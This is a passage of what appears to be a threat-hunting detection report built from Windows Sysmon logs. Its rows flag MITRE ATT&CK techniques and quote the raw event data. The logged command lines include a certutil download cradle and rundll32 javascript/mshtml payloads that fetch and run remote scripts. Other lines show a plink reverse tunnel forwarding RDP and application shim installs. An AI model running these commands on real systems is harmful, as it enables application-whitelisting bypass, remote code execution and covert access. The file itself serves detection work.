and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4981 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:34:20.619 + 747F3D96-665C-5D3F-0000-0010E37B8D00 + 4520 + C:\Windows\System32\certutil.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49832 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4980 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:20.410 + 747F3D96-665C-5D3F-0000-0010E37B8D00 + 4520 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-665C-5D3F-0000-0010096B8D00 + 7088 + C:\Windows\System32\cmd.exe + cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4980 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:20.410 + 747F3D96-665C-5D3F-0000-0010E37B8D00 + 4520 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-665C-5D3F-0000-0010096B8D00 + 7088 + C:\Windows\System32\cmd.exe + cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436060.262273,2019-07-30T01:34:20.262273+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4978 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:20.134 + 747F3D96-665C-5D3F-0000-0010096B8D00 + 7088 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);})",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4977 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:15.502 + 747F3D96-6657-5D3F-0000-001011298D00 + 1004 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6657-5D3F-0000-001029198D00 + 1808 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4977 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:15.502 + 747F3D96-6657-5D3F-0000-001011298D00 + 1004 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6657-5D3F-0000-001029198D00 + 1808 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4977 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:15.502 + 747F3D96-6657-5D3F-0000-001011298D00 + 1004 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6657-5D3F-0000-001029198D00 + 1808 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553029101.014473,2019-03-20T00:58:21.014473+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966480 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:58:20.894 + 365ABB72-57EC-5C91-0000-001097810900 + 2848 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q "C:\Users\user01\Desktop\titi.sdb" + C:\Users\user01\Desktop\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436055.252183,2019-07-30T01:34:15.252183+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4975 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:15.202 + 747F3D96-6657-5D3F-0000-001029198D00 + 1808 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028767.484881,2019-03-20T00:52:47.484881+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966464 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:52:47.364 + 365ABB72-569F-5C91-0000-0010D96C0800 + 3140 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1550311342.965921,2019-02-16T14:02:22.965921+04:00,,Threat,High,User Name : ( PC01\IEUser ) with Command Line : ( plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test ) contain suspicious command ( plink.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1940899 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-02-16 10:02:21.934 + 365ABB72-DFAD-5C67-0000-0010E0811500 + 2312 + C:\Users\IEUser\Desktop\plink.exe + Release 0.70 + Command-line SSH, Telnet, and Rlogin client + PuTTY suite + Simon Tatham + plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test + C:\Users\IEUser\Desktop\ + PC01\IEUser + 365ABB72-D6AB-5C67-0000-002056660200 + 0x26656 + 1 + High + SHA1=7806AD24F669CD8BB9EBE16F87E90173047F8EE4 + 365ABB72-D92A-5C67-0000-0010CB580900 + 3904 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"))",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4971 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:10.619 + 747F3D96-6652-5D3F-0000-001058828C00 + 348 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6652-5D3F-0000-0010B9708C00 + 5844 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4971 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:10.619 + 747F3D96-6652-5D3F-0000-001058828C00 + 348 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6652-5D3F-0000-0010B9708C00 + 5844 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4971 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:10.619 + 747F3D96-6652-5D3F-0000-001058828C00 + 348 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6652-5D3F-0000-0010B9708C00 + 5844 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436050.388196,2019-07-30T01:34:10.388196+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4969 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:10.292 + 747F3D96-6652-5D3F-0000-0010B9708C00 + 5844 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32 AllTheThings.dll,EntryPoint)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4968 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.526 + 747F3D96-664D-5D3F-0000-0010BB5D8C00 + 5572 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4968 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.526 + 747F3D96-664D-5D3F-0000-0010BB5D8C00 + 5572 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4968 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.526 + 747F3D96-664D-5D3F-0000-0010BB5D8C00 + 5572 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 AllTheThings.dll,EntryPoint)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4967 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.475 + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-664D-5D3F-0000-0010F1498C00 + 6836 + C:\Windows\System32\cmd.exe + cmd /c rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028767.134377,2019-03-20T00:52:47.134377+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966449 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp 